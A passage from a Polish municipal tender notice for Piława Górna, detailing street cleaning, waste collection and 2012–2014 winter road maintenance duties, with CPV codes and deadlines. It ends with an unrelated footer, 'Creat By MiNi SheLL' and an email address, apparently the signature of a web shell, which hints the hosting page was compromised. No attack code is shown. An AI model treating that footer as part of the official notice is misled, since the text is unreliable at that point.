2.	Oczyszczanie  chodników  przy drogach, (w tym przystanków), parkingów poprzez dokładne zebranie i zamiatanie występujących nieczystości (np. piasek. liście, kwiatostany) aż do całkowitego ich usunięcia ręcznie lub przy użyciu przeznaczonych do tego celu zamiatarek  mechanicznych. Oczyszczanie mechaniczne chodników musi odbywać się w taki sposób, aby nie powodowało utrudnień w ruchu pieszym i skarg mieszkańców np. na pył i kurz unoszący się w powietrzu.
3.	Usuwanie zanieczyszczeń uprzątniętych z chodników przez właścicieli nieruchomości.
4.	Wywóz zebranych nieczystości do miejsc ich unieszkodliwienia.
5.	Zbieranie zanieczyszczeń i koszenie poboczy, pasów zieleni i rowów przy drogach oraz wywóz skoszonych części roślin.
6.	Zbieranie i wywóz odpadów zgromadzonych w przeznaczonych do tego celu urządzeniach ustawionych na chodnikach (ul. Młynarskiej, ul. Piastowskiej,                       ul. Chrobrego), w tym również na przystankach autobusowych oraz utrzymanie tych urządzeń w odpowiednim stanie sanitarnym, porządkowym i technicznym                           (80 pojemników należy opróżniać 2 x w tygodniu).
7.	Utrzymanie wiat przystankowych w ilości 11 szt, w czystości  poprzez co najmniej              6 - krotne  mycie  w ciągu roku. 
8.	Zbieranie z ulic, chodników i placów zwłok bezdomnych zwierząt i ich części oraz pozbywanie się ich. Usuwanie martwych zwierząt winno występować niezwłocznie, po wystąpieniu takiego faktu, postępując przy tym zgodnie z obowiązującymi przepisami             w tym zakresie.
9.	Malowanie i naprawa ławek (20 szt.)i skrzyń drewnianych na piasek (7 szt.) ustawionych na chodnikach i przy przystankach.
10.	Usuwanie odpadów powstałych na skutek wypadków i zjawisk                   atmosferycznych, w tym również usuwanie wiatrołomów i drzew uszkodzonych, stanowiących zagrożenie i przeszkody komunikacyjne (bezpośrednio po wystąpieniu zjawiska, w uzgodnieniu z Zamawiającym).
11.	Usuwanie większych odpadów z rzeki Piławy, w granicach administracyjnych miasta Piława Górna.
12.	Obsługę akcji: Sprzątanie Świata - usunięcie zebranych odpadów z wyznaczonych punktów miasta.
13.	Wymienione prace należy wykonywać zgodnie z przepisami ustawy z dnia 13 września 1996 r.  o utrzymaniu czystości i porządku w gminach (Dz. U. z 2005 r. Nr 236, poz. 2008 z późn. zm.) oraz ustawy z dnia 27 kwietnia 2001 r. o odpadach (Dz. U. z 2010 r. Nr 185, poz. 1243 z późn. zm.)..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.61.00.00-6, 90.61.10.00-3, 90.91.40.00-7, 90.51.32.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 14.11.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Zimowe utrzymanie ulic, chodników i placów w okresie:
od 15.11.2012 r. do 15.03.2013 r. oraz od 15.11.2013 r. do 15.03.2014 r..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Odśnieżanie 
Dopuszczalna jest cienka warstwa zajeżdżonego śniegu, nie utrudniającego poruszania się. Gołoledź (cienka warstwa lodowa o grubości do 1 mm) powinna znikać po trzech godzinach od momentu pojawienia się. 
2.	Likwidację śliskości (posypywanie dróg oraz chodników i placów na całej szerokości),
3.	Zapewnienie, aby części jezdni przy przejściach dla pieszych i przystankach autobusowych były w okresie mrozów i opadów śnieżnych oczyszczone ze śniegu i lodu - przez ich ręczne doczyszczenie, 
4.	Zbieranie i pozbywanie się śniegu, lodu oraz innych zanieczyszczeń z przystanków  komunikacyjnych, 
5.	Wywóz śniegu z ulic, placów  i chodników (w tym: uprzątniętego przez właścicieli nieruchomości), gdzie stanowiłby on przeszkodę dla ruchu ulicznego i pieszego - przejścia dla pieszych.
Uwaga. 
Śnieg nie może być gromadzony w pryzmach o wysokości większej niż 1 m. Stosy te nie mogą być przeszkodą dla ruchu oraz nie mogą zamykać dojazdu do nieruchomości, 
6.	Zapewnienie, aby części jezdni przy krawężnikach oraz studzienki kanalizacyjne były            w okresie mrozów i opadów śnieżnych oczyszczone ze śniegu i lodu w stopniu umożliwiającym spływ z jezdni wody powstałej z topniejącego śniegu.
7.	Montaż, we wskazanych przez Zamawiającego miejscach, siatek przeciwśnieżnych przekazanych przez Zamawiającego w ilości ok. 400 mb oraz ich demontaż w terminie wskazanym przez Zamawiającego.
Jeżeli zima będzie bezśnieżna obowiązkiem firmy jest dokładne sprzątanie ulic, chodników i placów oraz wywóz  zebranych śmieci.
8.	Prowadzenie ZUD:
1)	zwalczanie gołoledzi, lodowicy, śliskości pośniegowej, szronu, szadzi                             przy użyciu materiałów naturalnych;
2)	odśnieżanie i uszorstnianie materiałami naturalnymi;
3)	zwalczanie śliskości materiałami uszorstniającymi z użyciem środków chemicznych (mieszanka 1:10).
9.	Kolejność i standardy zimowego utrzymania dróg. 
Jezdnie stanowiące przebieg ciągów ulicznych zostały podzielone na trzy kategorie tj. I, II i III.
Pierwsza (I) - część dróg lokalnych miejskich, stanowiąca podstawowy układ komunikacyjny miasta. 
Do odśnieżania i likwidacji śliskości należy przystąpić gdy warstwa śniegu przekroczy 3 cm. Odśnieżanie i posypywanie powinno być zakończone w ciągu 4 godzin po ustaniu opadów;
Druga (II)   -  część dróg lokalnych miejskich, stanowiących uzupełnienie układu podstawowego.
Do odśnieżania i likwidacji śliskości należy przystąpić                           po zakończeniu odśnieżania dróg I kolejności. Odśnieżanie                       i posypywanie powinno być zakończone w ciągu 6 godzin po ustaniu opadów;
Trzecia (III)  -    pozostałe drogi lokalne miejskie.
Do odśnieżania i likwidacji śliskości należy przystąpić                            po zakończeniu odśnieżania dróg II kolejności. Odśnieżanie                      i posypywanie powinno być zakończone w ciągu 8 godzin po ustaniu opadów.
Pozostałe gminne drogi  - należy utrzymywać w stałej przejezdności. 
10. Zwalczanie śliskości jezdni
1)	Przejazdy patrolowe wykonywane przez pługopiaskarki  i rozrzutniki połączone                z uszorstnianiem nawierzchni jezdni w miejscach, gdzie wystąpiło zjawisko;
2)	Posypywanie mechaniczne naturalnym materiałem uszorstniającym;
3)	Odśnieżanie jezdni po rozpoczęciu opadów (w miarę potrzeb połączone                               z uszorstnianiem).
11.	Utrzymywanie w czystości ulic, chodników i placów.
1)	Zbieranie i wywóz odpadów zgromadzonych w przeznaczonych do tego celu urządzeniach ustawionych na chodnikach (ul. Młynarskiej, ul. Piastowskiej,                ul. Chrobrego), w tym również na przystankach autobusowych oraz utrzymanie tych urządzeń w odpowiednim stanie sanitarnym, porządkowym i technicznym                   (80 pojemników należy opróżniać 2 x w tygodniu);
2)	Zbieranie z ulic, chodników i placów zwłok bezdomnych zwierząt i ich części oraz pozbywanie się ich. Usuwanie martwych zwierząt winno występować niezwłocznie, po wystąpieniu takiego faktu, postępując przy tym zgodnie z obowiązującymi przepisami w tym zakresie;
3)	Usuwanie odpadów powstałych na skutek wypadków i zjawisk                   atmosferycznych, w tym również usuwanie wiatrołomów i drzew uszkodzonych, stanowiących zagrożenie i przeszkody komunikacyjne (bezpośrednio                        po wystąpieniu zjawiska, w uzgodnieniu z Zamawiającym).
12.	Wymienione prace należy wykonywać zgodnie z przepisami ustawy z dnia 
13 września 1996 r.  o utrzymaniu czystości i porządku w gminach (Dz. U. z 2005 r. Nr 236, poz. 2008 z późn. zm.) oraz ustawy z dnia 27 kwietnia 2001 r. o odpadach                (Dz. U. z 2010 r. Nr 185, poz. 1243 z późn. zm.)..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.62.00.00-9, 90.51.32.00-8, 90.51.13.00-5, 90.61.10.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.03.2014.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com